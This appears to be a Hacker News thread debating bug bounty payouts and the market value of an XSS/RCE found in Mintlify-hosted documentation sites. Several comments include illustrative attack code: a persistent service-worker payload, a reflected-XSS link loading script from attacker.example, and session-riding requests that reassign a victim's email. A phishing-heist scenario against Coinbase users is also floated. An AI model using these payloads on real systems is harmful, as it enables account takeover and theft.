
Ehhhhhh careful, Mismeasure hasn't held up well, and there are better arguments.

This is identical to a comment you wrote on the other story about these vulnerabilities that's higher up on the front page, which isn't great.

I directionally agree with you but we could go another 20 comments deep on exactly what the purpose of an external pentest or red-team exercise is and how it might not match up perfectly with what an amateur web hacker is currently doing. But like: yeah, they could get into that business, at least until AI eats it.

Just going to say here that people routinely engage pentest firms, several times annually, for roughly that sum of money, hoping for but not expecting game-over vulnerabilities (and, from bitter experience as a buyer rather than a seller of those services over the last 5 years, "no game-over vulnerabilities" is a very common outcome!)

No it would not have been.

This specific XSS vulnerability may not have been, but the linked RCE vulnerability found by their friend https://kibty.town/blog/mintlify/ certainly would've been worth more than the $5,000 they were awarded.

A vulnerability like that (or even a slightly worse XSS that allowed serving JS instead of only SVG) could've let them register service workers for all visiting users, giving them the ability to re-trigger XSS at any time, even after the original RCE and XSS were patched.
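
A rough sketch of what that persistence trick looks like, assuming the attacker can get a same-origin script URL to hand to the browser (all the names here are made up):

    // Hypothetical payload running via the original XSS/RCE on the vulnerable origin.
    // It registers a service worker that keeps intercepting requests after the bug is fixed.
    async function persist(): Promise<void> {
      if (!("serviceWorker" in navigator)) return;
      // The worker script must be same-origin and served with a JavaScript MIME type,
      // which is exactly what the "JS instead of only SVG" caveat above is about.
      const reg = await navigator.serviceWorker.register("/sw.js", { scope: "/" });
      console.log("worker now controls", reg.scope);
    }
    persist();

    // Inside the hypothetical /sw.js, future page loads can be rewritten at will:
    // self.addEventListener("fetch", (e) => {
    //   e.respondWith(new Response("<script>/* attacker code */<\/script>",
    //     { headers: { "Content-Type": "text/html" } }));
    // });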


Maybe? I don't know enough about the vulnerability. Is it serverside? Then it isn't worth very much.

Could you elaborate on why not?

What 'arcwhite said (sorry, I got dragged into a call).

1. The exploits (not vulnerabilities; that's mostly not a thing) that command grey/black market value all have half-lives.

2. Those exploits all fit into existing business processes; if you're imagining a new business, one that isn't actively running right now as we speak (such as you'd have to do to fit any XSS in a specific service), you're not selling an exploit; you're planning a heist.

3. The high-dollar grey market services traffic exclusively in RCE (specifically: reliable RCE exploits, overwhelmingly in mainstream clientside platforms, with sharp dropoffs in valuation as you go from e.g. Chrome to the next most popular browser).

4. Most of the money made in high-ticket exploit sales apparently (according to people who actually do this work) comes on the backend, from tranched maintenance fees.


There's generally no grey market for XSS vulns. The people buying operationalized exploits generally want things that they can aim very specifically to achieve an outcome against a particular target, without that target knowing about it, and operationalized XSS vulns seldom have that nature.

Your other potential buyers are malware distributors and scammers, who usually want a vuln that has some staying power (e.g. years of exploitability). This one is pretty clearly time-limited once it becomes apparent.


It would have been. Ten times the amount at least.

For a reflected XSS? Tell me who is paying that much for such a relatively common bug...

To elaborate: to exploit this you have to convince your target to open a specially crafted link, which would look very suspect. The most realistic approach would be to send a shortened link and hope that they click on it, that they are logged into discord.com when they do (most people use the app), that there are no other protections in place (e.g. HttpOnly cookies), etc.

There's no real way to use this to compromise a large number of users without more complex means.
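
For what it's worth, the HttpOnly point is the load-bearing one. A minimal sketch of the constraint, with made-up URLs:

    // Hypothetical crafted link: the payload has to travel in the URL itself, which is
    // why it looks suspect and why a shortener is the realistic delivery mechanism.
    const lure =
      "https://target.example/search?q=" +
      encodeURIComponent('"><script src="https://attacker.example/p.js"></script>');

    // Inside the reflected payload: cookies flagged HttpOnly never appear in
    // document.cookie, so plain session theft fails even though the script is
    // running on the target origin.
    const visible = document.cookie; // only non-HttpOnly cookies, often nothing useful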


It isn't about how common the bug is, but the level of access it gets you and the type or sheer scale of the target. This bug on your blog? Who cares. This bug on Discord or AWS? Much more attractive and lucrative.

Yes, but this is not a particularly high access level bug.

Depending on the target, it's possible that the most damage you could do with this bug is a phishing attack where the user is presented with a fake sign-in form (on a sketchy URL).

I think $4k is a fair amount; I've done HackerOne bounties too, and we got less than that years ago for a Twitter reflected XSS.


Why would that be the maximum damage? This XSS is particularly dangerous because you are running your script on the same domain where the user is logged in, so you can pretty much do anything you want under their session.

In addition, this is widespread. It's golden for any attacker.
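
A minimal sketch of what "anything you want under their session" tends to mean in practice; the endpoint names are made up, but the point is that same-origin requests carry the victim's cookies regardless of HttpOnly:

    // Runs in the victim's browser, on the vulnerable origin, via the XSS.
    // The browser attaches session cookies automatically; HttpOnly doesn't help here.
    async function actAsVictim(): Promise<void> {
      // Read anything the app's own front end can read (including CSRF tokens, if any).
      const me = await fetch("/api/me", { credentials: "include" }).then((r) => r.json());
      // Then perform state-changing actions as the victim, e.g. swap the account email.
      await fetch("/api/settings/email", {
        method: "POST",
        credentials: "include",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ userId: me.id, email: "attacker@attacker.example" }),
      });
    }
    actAsVictim();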


Because modern cookie directives and browser configs neuter a lot of the worst XSS outcomes/easiest exploit paths. I would expect all the big sites to be setting them, though I guess you never know.
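
("Modern cookie directives and browser configs" here roughly means headers like the ones below; a generic sketch, not anything site-specific:)

    import { createServer } from "node:http";

    // Illustrative defaults only; real sites tune these per application.
    createServer((req, res) => {
      // HttpOnly keeps the cookie out of document.cookie; SameSite limits cross-site sends.
      res.setHeader("Set-Cookie", "session=abc123; HttpOnly; Secure; SameSite=Lax; Path=/");
      // A strict CSP blocks inline or injected script even if markup does get reflected.
      res.setHeader("Content-Security-Policy", "default-src 'self'; script-src 'self'");
      res.setHeader("Content-Type", "text/html; charset=utf-8");
      res.end("<h1>hello</h1>");
    }).listen(8080);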

I would not be that confident, as you can see: in their first example, they show Discord, and the XSS code executes directly on discord.com under the logged-in account (some people actually use the web version of Discord to chat, or sign in on the website for whatever reason).

If you have a high-value target, it is a great opportunity to use such exploits, even for single shots (it would likely go undetected anyway, since it's a drop in the ocean of requests).

Spreading it across the whole internet is not a good strategy, but for 4,000 USD, being able to target a few users is great value.

Besides XSS, phishing is its own opportunity.

Example: Coinbase is affected too, though on the docs subdomain, and there is 2-step verification, so you cannot make transactions directly. But if you just replace the content with a "Sign in to Coinbase / Follow this documentation procedure / Download this update" page, this can get very, very profitable.

Someone would pay 4,000 USD to receive 500,000 USD back in stolen bitcoin.

Still, purely by executing things under user sessions, there are interesting things to do.


Again, here you have not so much sold a vulnerability as you have planned a heist. I agree, preemptively: you can get a lot of money from a well-executed heist!

Do you want to execute actions as a logged-in user on high-value website XXX?

If yes -> very useful


Nobody is disputing that a wide variety of vulnerabilities are "useful", only that there's no market for most of them. I'd still urgently fix an XSS.

There is a market outside Zerodium: it's Telegram. Finding a buyer takes time and trust, but it definitely has a higher value than 4k USD because of its real-world impact, even if it is technically lower on the CVSS scores.

Really? Tell me a story about someone selling an XSS vulnerability on Telegram.

("The CVSS chart"?)

Moments later

Why do people keep bringing up "Zerodium" as if it's a thing?


I understand your perspective about the technical value of an exploit, but I disagree with the concept that technical value = market value.

There are unorganized buyers who may be interested if they see potential to weaponize it.

In reality, if you want to maximize revenue, yes, you need to organize your own heist (if that's what you meant)


How would you make money from this? Most likely via phishing. Not exactly a zero-click RCE.

What happens in all these discussions is that we stealthily transition from "selling a vulnerability" to "planning a heist", and you can tell yourself any kind of story about planning a heist.

I don't like tptacek, but it's insane to not back up this comment with any amount of evidence or at least explanation. The guy knows his shit.

Hey I was wrong about Apple downthread.

What "grey market" are you talking about? How specific can you be about it?

I know you love asking people this question, so sorry to spoil your fun, but you know just as well as I do that there isn't really a "grey market".

There absolutely is. I'm just not familiar with one that buys these vulnerabilities.

Can you cite a source for that claim? The USG paying mid-5-figures for an XSS vulnerability? That's news to me.

The book "This Is How They Tell Me the World Ends" by Nicole Perlroth, while it's about the history of cyberweapons it does a very good job detailing the late 90s to early 2010s exploit market.

I don't have it in front of me, but I'm talking about the "nobody but us" era of exploit markets:

https://en.wikipedia.org/wiki/NOBUS

Where the NSA was seemingly buying anything, even if not worthwhile, as a form of "munitions collection" to be used for future attacks.

edit: this mostly ended in the US because other nations started paying more; add in more regulation (only a handful of companies are allowed to sell these exploits internationally) and software companies starting to adopt basic security practices (along with rolling out their own bug bounties), and it just mostly whimpered away.

Also relevant to the discussion: the book covers how the public exploit markets are exploitative toward the researchers themselves (low payouts when state actors would pay more), and how there were periods of open revolt too (see the 2009 "No More Free Bugs" movement, also discussed in the book).

Definitely worth it if you aren't aware of this history; I wasn't.


I haven't read her book, am myself somewhat read in to the background here, and if she's claiming NSA was stockpiling serverside web bugs, I do not believe her.

In reality, intelligence agencies today don't even really stockpile mobile platform RCE. The economics and logistics are counterintuitive. Most of the money is made on the "backend", in support/update costs, paid in tranches; CNE vendors have to work hard to keep up with the platforms even when their bugs aren't getting burned. We interviewed Mark Dowd about this last year for the SCW podcast.


Maybe there is a misunderstanding: I'm not saying that the NSA would be buying XSS scripts. I'm saying that if this were 35 years ago, the NSA would be buying exploits for common user software. Back then the exploits were "lesser", but there was still a market, and not every exploit that was bought was a wonder of software engineering. Nowadays the target market is the web, and getting exploits on some of the most-used sites would be worth buying.

The kid was simply born in the wrong era to cash in on easy money.


I think you're wrong about this. 35 years ago was 1990. Nobody was selling vulnerabilities in 1990 at all. By 1995, I was belting out memory corruption RCEs (it was a lot easier then), and there was no market for them at all. And there has never been a market for web vulnerabilities like XSS.

Building reliable exploits is very difficult today, but the sums a reliable exploit on a mainstream mobile platform garners are also very high. Arguably, today is the best time to be doing that kind of work, if you have the talent.


I can't imagine intelligence agencies/DoD not doing this with their gargantuan black budgets, if it's relevant to a specific target. They already contract with private research centers to develop exploits, and it's not like they're gonna run short on cash

If that were the case, we'd routinely see mysterious XSS exploits on social networks. The underlying bugs are almost always difficult to target! And yet we do not.

The biggest problem, again, is that the vulnerabilities disappear instantaneously when the vendors learn about them; in fact, they disappear in epsilon time once the vulnerabilities are used, which is not how e.g. a mobile browser drive-by works.


Why would YOU see a mystery XSS exploit on a social network? The idea of the DoD keeping these little exploits in a box is usually to deploy them in a highly controlled and specific manner. You as a layperson are of no interest to them unless you are some kind of intelligence asset or foreign adversary.

Wouldn't platforms see the supposed XSS payloads in their logs and publish analyses of them, or at the very least, announce that they happened?

It seems like none of these major websites detected anything, and they are supposed to be among the best in the world.

They only found out because the researcher contacted them.


Also because nobody actively exploited them! You're using the word "detected" to mean "discovered", which nobody working in the field would ever do.

detected: the WAF caught the attack and raised an alert, post-exploitation

discovered: they audited or pentested themselves and found it preemptively

I just mean that Coinbase didn't see anything happening and didn't take action, even though the boy successfully exploited the vulnerability on their live system.


This comes up on every story about bug bounties. There is in general no market at all for XSS vulnerabilities. That might be different for Twitter, Facebook, Instagram, and TikTok, because of the possibility of monetizing a single strike across a whole huge social network, and there's maybe a bank-shot argument for Discord, but you really have to do a lot of work to generate the monetization story for any of those.

The vulnerabilities that command real dollars all have half-lives, and can't be fixed with a single cluster of prod deploys by the victims.


If a $500 drone is coming for your $100M factory, the price limit for defense considerations isn't $500.

In the end, you are trying to encourage people not to fuck with your shit, instead of playing economic games. Especially with a bunch of teenagers who wouldn't even be fully criminally liable for doing something funny. $4K isn't much today, even for a teenager. Thanks to stupid AI shit like Mintlify, that's like worth 2GB of RAM or something.

It's not just compensation, it's a gesture. And really bad PR.


That's not how any of this works. A price for a vulnerability tracking the worst-case outcome of that vulnerability isn't a bounty or a market-clearing price; it's a shakedown fee. Meanwhile: the actual market-clearing price of an XSS vulnerability is very low (in most cases, it doesn't exist at all) because there aren't existing business processes those vulnerabilities drop seamlessly into; they're all situational and time-sensitive.

> the actual market-clearing price of an XSS vulnerability is very low (in most cases, it doesn't exist at all) because there aren't existing business processes those vulnerabilities drop seamlessly into; they're all situational and time-sensitive.

Could you elaborate on this? I don't fully understand the shorthand here.


I'm happy to answer questions but the only thing I could think to respond with here is just a restatement of what I said. I was terse; which part do you want me to expand on? Sorry about that!

> because there aren't existing business processes those vulnerabilities drop seamlessly into; they're all situational and time-sensitive.

what's an example of an existing business process that would make them valuable, just in theory? why do they not exist for xss vulns? why, and in what sense, are they only situational and time-sensitive?

i know you're an expert in this field. i'm not doubting the assertions, just trying to understand them better. if i understand your argument correctly, you're not doubting that the vuln found here could be damaging, only doubting that it could make money for an adversary willing to exploit it?


A remote code execution bug in iOS is valuable: it may take a long time to detect exploitation (potentially years if used carefully), and even after it's discovered there is a long tail of devices that take time to update (although less so than on Android, or Linux running on embedded devices that can't be updated). That's why it's worth millions on the black market, and why Apple will pay you $2 million for it.

An XSS is much harder to exploit quietly (the server can log everything), and can be closed immediately, 100%, with no long tail. At the push of an update the vulnerability is worth zero. Someone paying to purchase an XSS is probably intending to use it once (with a large blast radius) and get as much as they can from it in the time until it is closed (hours? maybe days?)


I can't think of a business process that accepts and monetizes pin-compatible XSS vulnerabilities.

But for RCE, there's lots of them! RCE vulnerabilities slot into CNE implants, botnets, ransomware rigs, and organized identity theft.

The key thing here is that these businesses already exist. There are already people in the market for the vulnerabilities. If you just imagine a new business driven by XSS vulnerabilities, that doesn't create customers, any more than imagining a new kind of cloud service instantly gets you funded for one.


Thank you, makes a lot of sense.

I wonder what you think of this, re: the disparity between the economics you just laid out and the "companies are such fkn misers!" comments that always arise in these threads on bounty payouts...

I've seen first hand how companies devalue investment in security -- after all, it's an insurance policy whose main beneficiaries are their customers. Sure it's also reputational insurance in theory, but what is that compared with showing more profit this quarter, or using the money for growth if you're a startup, etc. Basically, the economic incentives are to foist the risks onto your customers and gamble that a huge incident won't sink you.

I wonder if that background calculus -- which is broadly accurate, imo -- is what rankles people about the low bounty rewards, especially from companies that could afford more?


The premise the "fucking companies are misers" crowd operates on, and that I don't share, is that vulnerabilities are finite and that, in the general case, there's an existential cost to not identifying and fixing them. From decades of vulnerability research work, including (over the past 5 years) as a buyer rather than a seller of that work: put 2 different teams on a project, get 2 different sets of vulnerabilities, with maybe 30-50% overlap. Keep doing that; you'll keep finding stuff.

Seen in that light, bug bounty programs are engineering services, not a security control. A thing generalist developers definitely don't get about high-end bug bounty programs is that they are more about focusing internal resources than they are about generating any particular set of bugs. They're a way of prioritizing triage and hardening work, driven by external incentives.

The idea that Discord is, like, eliminating their XSS risk by bidding for XSS vulnerabilities from bounty hunters; I mean, just, obviously no, right?


> That's not how any of this works.

Yes, evidently not.

Just because, on average, intelligence agencies or ransomware distributors wouldn't pay big bucks for XSS on Zerodium etc. doesn't mean that's what sets the fair, or wise, price for disclosure. Every bug bounty program is mostly PR mitigation. It's bad PR if you underpay for a disclosed vulnerability that could have ended your business, considering the price of the security audits/practices you cheaped out on. I mean, most bug bounty programs are actually paid out by scope, not by the market price of technically comparable exploits. If you found an XSS vulnerability in an Apple service with this scope, I bet you would have been paid more than 4k.


Nobody is buying anything on "Zerodium".

I wasn't aware they were gone. It's not my game; replace it with whatever shady exploit trader/market is out there.

I do not in fact think you would make a lot more than $4000, or even $4000 in the first place, for an Apple XSS bug, unless it was extraordinarily situationally powerful (for instance, a first-stage for a clean, direct RCE). Bounty prices have nothing at all to do with the worst-case damage a motivated actor could cause with a vulnerability.

https://security.apple.com/bounty/categories/

The lowest tier is $5k. XSS up to $40k. I think we're talking exfiltration of dev credentials...


Nice, I hadn't seen that. Well, there you go: the absolute most you're going to make for the absolute worst-case XSS bug at the largest software firm in the world.

I don't think anybody in SFBA-style software development, both pre- and post-LLM, is really resilient against these kinds of attacks. The problem isn't vibe coding so much as it is multiparty DLL-hell dependency stacks, which is something I attribute more to Javascript culture than to any recent advance in technology.

I wonder what's worse: SFBA-style software development, but with the SFBA-style 2-hour response window to serious bugs that Discord showed, or the old-fashioned enterprise route, where you report your bug and within 2 months you'll receive an e-mail confirming your report if you're lucky, and a letter from a lawyer if you're not.

You're right that it's a specific programming culture that is especially vulnerable to it. And, for the same reasons, it was vulnerable to the same thing, to a lesser degree, before the rise of LLMs.

But like, this case isn't really a dependency or supply chain attack. It's just allowing remote code execution because, idk, the dev who implemented it didn't read the manual and see that MDX can execute arbitrary code, or something. Or maybe they vibe coded it, saw it worked, and didn't bother to check. Perhaps it's a supply-chain attack on Discord et al. in the sense that they use Mintlify; if that's what you meant, then I apologize.
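
(To make the MDX point concrete: MDX is markdown plus JSX, and JSX expressions are just code, so rendering untrusted MDX means running untrusted code. A contrived sketch, with the untrusted document held in a string:)

    // Untrusted "documentation" a customer uploads. If the platform compiles and
    // evaluates this MDX, the braced expression below runs as real JavaScript there.
    const userSuppliedMdx = `
    # Totally normal docs page

    {(() => {
      // arbitrary code; in a Node renderer this could reach child_process, fs, etc.
      return "rendered " + (1 + 1) + " things";
    })()}
    `;

    // The unsafe step is some variant of compile(userSuppliedMdx) followed by
    // evaluating the result. Treating MDX as "just markdown" is the mistake.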

I think you're right that I have an extreme aversion to SFBA-style software development, partly because of how gen-AI is used there.


One might consider this a supply chain attack because the title of the post is “We pwned X, Vercel, Cursor, and Discord through a supply-chain attack”

I do occasionally wonder how different things would be if JavaScript had come with a very robust standard library from early on.

You're preaching to the choir about the fragility of the "dig the dependency stack all the way down to hell" paradigm. But I don't think it applies in this particular case (neither does attributing it to vibe coding, IMHO).

The component that ultimately executed the payload in the SVG was the browser; the backend dependency stack just served it verbatim as specified by the user. This is a 1990s-style XSS fuckup, not anything subtle.
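
Concretely (a contrived payload plus the decades-old mitigations, since the point is that nothing exotic is going on):

    // An SVG is an XML document that can carry script. If user uploads are served
    // verbatim as image/svg+xml from the main origin and the victim navigates to
    // the file directly, the browser runs the script in that origin.
    const uploadedSvg = `<svg xmlns="http://www.w3.org/2000/svg">
      <script>/* same-origin JavaScript runs here */</script>
    </svg>`;

    // Classic mitigations, none of them new:
    //   - serve user uploads from a separate, cookieless domain
    //   - send Content-Disposition: attachment so the file downloads instead of rendering
    //   - and/or set a restrictive Content-Security-Policy on the upload host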


Please don't post insinuations about astroturfing, shilling, brigading, foreign agents, and the like. It degrades discussion and is usually mistaken. If you're worried about abuse, email hn@ycombinator.com and we'll look at the data.

https://news.ycombinator.com/newsguidelines.html


Sorry, didn't realize.
